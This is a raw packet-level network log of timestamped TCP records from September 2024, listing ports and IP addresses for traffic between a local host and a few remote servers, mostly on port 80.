Sep 3, 2024 17:13:22.111751080 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.111759901 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.111771107 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.111778021 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.111780882 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.111802101 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.111829042 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.111916065 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.111926079 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.111937046 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.111953020 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.111963034 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.111974955 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.111987114 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.111994982 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.111994982 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.111999989 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.112014055 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.112016916 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.112025976 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.112035036 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.112052917 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.112101078 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.112112999 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.112124920 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.112134933 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.112138987 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.112138987 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.112173080 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.112176895 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.112188101 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.112191916 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.112205029 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.112217903 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.112245083 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.112268925 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.112366915 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.112377882 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.112390041 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.112401962 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.112416983 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.112418890 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.112428904 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.112440109 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.112440109 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.112452984 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.112461090 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.112466097 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.112477064 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.112504005 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.112510920 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.112570047 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.112605095 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.112617970 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.112627983 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.112638950 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.112649918 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.112662077 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.112673998 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.112685919 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.112685919 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.112704992 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.112720966 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.113234997 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.113245964 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.113265038 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.113300085 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.113302946 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.113302946 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.113317013 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.113327980 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.113339901 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.113367081 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.113367081 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.113368034 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.113368034 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.113647938 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.113658905 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.113668919 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.113681078 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.113692045 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.113703966 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.113713980 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.113714933 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.113729000 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.113744974 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.113775015 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.114103079 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.114171028 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.114181042 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.114197016 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.114227057 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.114238977 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.114250898 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.114260912 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.114260912 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.114276886 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.114316940 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.114339113 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.114396095 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.114398956 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.114411116 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.114423037 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.114428043 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.114438057 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.114453077 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.114458084 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.114470005 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.114504099 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.114504099 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.114525080 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.114738941 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.114752054 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.114792109 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.114793062 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.114804029 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.114814997 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.114826918 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.114836931 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.114849091 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.114850044 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.114860058 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.114876986 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.114902020 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.128669024 CEST	80	49735	185.215.113.26	192.168.2.8
Sep 3, 2024 17:13:22.128719091 CEST	49735	80	192.168.2.8	185.215.113.26
Sep 3, 2024 17:13:22.206703901 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.206722975 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.206737041 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.206772089 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.206778049 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.206792116 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.206806898 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.206839085 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.206839085 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.207021952 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.207041979 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.207056999 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.207076073 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.207083941 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.207091093 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.207124949 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.207124949 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.207158089 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.207175016 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.207276106 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.207289934 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.207290888 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.207304955 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.207319021 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.207319975 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.207333088 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.207348108 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.207360983 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.207360983 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.207360029 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.207380056 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.207405090 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.207413912 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.207586050 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.207598925 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.207612991 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.207626104 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.207628012 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.207639933 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.207653999 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.207658052 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.207658052 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.207668066 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.207681894 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.207689047 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.207716942 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.207734108 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.207818985 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.207834005 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.207845926 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.207861900 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.207864046 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.207864046 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.207875967 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.207890987 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.207890987 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.207905054 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.207909107 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.207921028 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.207940102 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.207953930 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.209496975 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.209510088 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.209523916 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.209538937 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.209562063 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.209562063 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.209567070 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.209578037 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.209583998 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.209599018 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.209610939 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.209646940 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.209646940 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.209662914 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.209703922 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.209713936 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.209728956 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.209765911 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.209765911 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.209794044 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.209840059 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.209925890 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.209970951 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.209985018 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.209985018 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.210016012 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.210027933 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.210092068 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.210109949 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.210124016 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.210134983 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.210141897 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.210156918 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.210170031 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.210213900 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.210227013 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.210235119 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.210241079 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.210256100 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.210263968 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.210278988 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.210290909 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.210302114 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.210302114 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.210310936 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.210325003 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.210335016 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.210336924 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.210350037 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.210352898 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.210369110 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.210369110 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.210385084 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.210441113 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.210541964 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.210556984 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.210607052 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.210607052 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.210644007 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.210658073 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.210670948 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.210691929 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.210706949 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.210716963 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.210716963 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.210722923 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.210738897 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.210761070 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.210784912 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.210951090 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.210963964 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.210975885 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.210989952 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.211003065 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.211015940 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.211029053 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.211050034 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.211050034 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.211050034 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.211090088 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.211289883 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.211302042 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.211344004 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.211349010 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.211363077 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.211421967 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.211421967 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.211466074 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.211479902 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.211493969 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.211507082 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.211525917 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.211529970 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.211549044 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.211570978 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.211590052 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.211631060 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.211643934 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.211658001 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.211672068 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.211685896 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.211688995 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.211700916 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.211731911 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.211731911 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.211782932 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.212275982 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.212294102 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.212307930 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.212321043 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.212333918 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.212337017 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.212368011 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.212383032 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.212399960 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.212414026 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.212429047 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.212444067 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.212455988 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.212485075 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.212497950 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.212512016 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.212524891 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.212541103 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.212554932 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.212555885 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.212555885 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.212569952 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.212582111 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.212611914 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.212694883 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.212708950 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.212722063 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.212760925 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.212760925 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.212781906 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.212795973 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.212810040 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.212824106 CEST	80	49730	52.212.52.84	192.168.2.8
Sep 3, 2024 17:13:22.212831974 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.212846041 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.212872028 CEST	49730	80	192.168.2.8	52.212.52.84
Sep 3, 2024 17:13:22.215352058 CEST	49726	80	192.168.2.8	185.215.113.17
Sep 3, 2024 17:13:22.220798969 CEST	80	49726	185.215.113.17	192.168.2.8
Sep 3, 2024 17:13:22.225825071 CEST	45580	49722	65.21.18.51	192.168.2.8
Sep 3, 2024 17:13:22.226994038 CEST	49722	45580	192.168.2.8	65.21.18.51
